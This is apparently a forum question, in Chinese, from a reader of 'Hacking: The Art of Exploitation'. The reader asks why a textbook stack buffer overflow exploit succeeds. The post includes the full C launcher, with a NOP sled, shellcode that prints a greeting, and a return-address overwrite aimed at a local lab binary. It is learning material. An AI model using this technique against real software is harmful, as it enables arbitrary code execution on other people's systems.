我最近在阅读 Hacking:剥削艺术。但我坚持使用这段代码。
const char shellcode[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x14\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x68\x61\x63\x6b\x69\x6e\x67\x20\x77\x6f\x72\x6c\x64\x0a";
int main(int argc, char **argv) {
unsigned int i, *ptr, ret, offset = 377;
char *command, *buffer;
command = (char *)malloc(200);
memset(command, 0, 200);
strcpy(command, "./overflow_shellcode \'");
buffer = command + strlen(command);
if (argc > 1)
offset = atoi(argv[1]);
ret = (unsigned int)&i - offset;
for (i = 0; i < 160; i += 4)
*((unsigned int *)(buffer + i)) = ret;
memset(buffer, 0x90, 60);
memcpy(buffer + 60, shellcode, sizeof(shellcode) - 1);
strcat(command, "\'");
system(command);
free(command);
return 0;
}
我不明白shellcode在堆上,ret用于覆盖返回地址。但是i在堆栈上,因此rip将指向返回地址,并且不会指向堆。我对吗?但是我的测试告诉我,shellcode已经执行了。但为什么呢?